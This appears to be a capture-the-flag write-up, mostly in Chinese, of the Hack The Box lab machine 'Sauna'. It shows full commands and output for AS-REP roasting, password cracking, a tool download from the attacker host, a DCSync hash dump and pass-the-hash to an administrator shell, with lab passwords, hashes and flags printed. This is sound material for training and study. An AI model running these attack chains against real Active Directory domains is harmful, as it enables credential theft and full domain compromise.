Recon

Nmap Scan

# Nmap 7.80 scan initiated Mon May 18 08:49:29 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-18 07:49:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC1DBAF%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-18T07:52:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 18 08:54:51 2020 -- 1 IP address (1 host up) scanned in 322.12 seconds

80端口全都是静态页面，没有什么有趣的东西，但是在页面上收集到了很多用户名称。从Nmap的LDAP脚本中，得知Domin EGOTISTICAL-BANK.LOCAL[toc]

1	rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL

从 This Ling,知道了在Active Directory中的命名协定的, 用Python写了一个简单的脚本来生成用户名的list.

#!/usr/bin/env python3

with open('username.txt','rw') as f:
    lines = f.readlines()

name = []
for i in lines:
    first_name = i.strip().split(' ')[0]
    last_name = i.strip().split(' ')[1]

    name.append(first_name+'.'+last_name)
    name.append(first_name+'.a.'+last_name)

    name.append(first_name[:1] + last_name)
    name.append(first_name[:1]+'a'+ last_name)

    name.append(first_name + last_name[:3])

for i in name:
    print(i)

User.txt

生成的用户名如下所示

~/Documents/HTB/Sauna root@kali
❯ cat username.list
Fergus.Smith
Fergus.a.Smith
FSmith
FaSmith
FergusSmi
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShaunCoi
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HugoBea
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BowieTay
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SophieDri
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StevenKer

使用 GetNPUsers.py dump 用户Kerberos的TGT

~/Documents/HTB/Sauna root@kali
❯ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/Documents/HTB/Sauna/username.list -dc-ip 10.10.10.175
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:46a8d7b10066d385f674ed31ee26bc2a$dde68c6967f491c95b1fb39458b129498844efd93398e5ac66af048ff9f1fc6f616806c1b3484b25f2728018bdbb1bfbd9577a04c2ddc4aed9a3a1eb99f89e8a793890faa7fcd2b97db1f96c7ad5addb54dfa6dbb386847dbc340eabf4e8e215b0d54c3dfe3b23703aa54e3c87144aba21dbed2f7eb470502da016cc43400a55a6b88220856c82c8eec69b1d512c50179eda04609fa8a50df0a66d63c0a3bc34dc13f421cd0513aa8826cf8b8d3d5b5df53b58c3402095f2471e1939dcb9517a17d745c97eb59bb99ec47afd918d47add4757fc73fb74d28a612e3dd50e047305d26dff45b304f282ff45950d4a141997c8589a67b45007eef9ea6427901159a
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

用Hashcat暴力破解获得明文密码.

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:471568f0203a51c89bbe1f615aaf7592$c85e3a933f11034e2046f08acac34fa1c50d4197d7a303e66c847a5f287f9fce21e308a625ce0686f9f917728d15bd5d8d5bc8c166c4d3fc1733a169a93a87c73d50f4a8903534b9101c6562b32202183c1ac9d3a6956f76570e67246cd5bc5a45818c7706b9c8a4e46582eda89b311792993f72e1fd09ae7c2312d1f69f62b97c837fd48253e30686369da282962c129764a377b48d76ed0cccbf63ae8b595c49e8191ec104ebb911ad7a18332fbe59beb20dd929d6c56109615dbc115cf217110330331a8de7f57335a7010b2ef28a2a29e20bb4a444daed2d13772a1558d90b54e19d7e750cdaa2f65d45d2ba2ff903fd60e97ed63966eac8037e48e3f5e3:Thestrokes23

使用Evil-winrm登录，拿到user.txt

C:\>cd users/FSmith/desktop
C:\users\FSmith\desktop>type user.txt
1b5520b98d97cf17f24122a55baf70cf

C:\users\FSmith\desktop>

Privilege Escalation

上传 winPEAS.exe, 发现用户svc_loanmgr的用户凭证

[+] Looking for AutoLogon credentials(T1012)                                                                                                                                                                                             
  Some AutoLogon credentials were found!!                                                                                                                                                                                                
  DefaultDomainName             :  EGOTISTICALBANK                                                                                                                                                                                       
  DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                                                                                                                                                                       
  DefaultPassword               :  Moneymakestheworldgoround!

使用该凭证登录用户svc_loanmgr, 上传 SharpHound.exe收集更多AD域的信息

PS C:\users\svc_loanmgr\Documents> wget 10.10.16.38/SharpHound.exe -o SharpHound.exe
PS C:\users\svc_loanmgr\Documents> dir


    Directory: C:\users\svc_loanmgr\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        5/19/2020   4:11 AM         832512 SharpHound.exe                                                        


PS C:\users\svc_loanmgr\Documents> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 4:11 AM on 5/19/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 4)/s -- Using 27 MB RAM
Enumeration finished in 00:00:15.1741120
Compressing data to .\20200519041151_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 4:12 AM on 5/19/2020! Happy Graphing!

PS C:\users\svc_loanmgr\Documents> dir


    Directory: C:\users\svc_loanmgr\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        5/19/2020   4:12 AM           9142 20200519041151_BloodHound.zip                                         
-a----        5/19/2020   4:11 AM         832512 SharpHound.exe                                                        
-a----        5/19/2020   4:12 AM          11187 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin                  


PS C:\users\svc_loanmgr\Documents>

下载Zip文件并将其放入BloodHound中，发现该用户具有GetChangesAll特权，因此我们可以进行dcsync攻击来获取任意主体的密码哈希。

root@kali:~/Documents/HTB/Sauna# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175 -just-dc
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e5121be48d87ef3c8f22a887adfe8ed5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:fe0bd95e0547a5e344b6b4a33e0d3968a54164c620ebdd82ba67e6b68f5986f5
SAUNA$:aes128-cts-hmac-sha1-96:a4be6aec07b2eaf7c1133e8a734d7c29
SAUNA$:des-cbc-md5:3e677c9ec7ecb045
[*] Cleaning up... 
root@kali:~/Documents/HTB/Sauna#

使用Hash登录administrator，获得root.txt

~/Documents/HTB/Sauna root@kali 49s
❯ wmiexec.py EGOTISTICAL-BANK.LOCAL/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users/administrator/desktop
C:\users\administrator\desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
C:\users\administrator\desktop>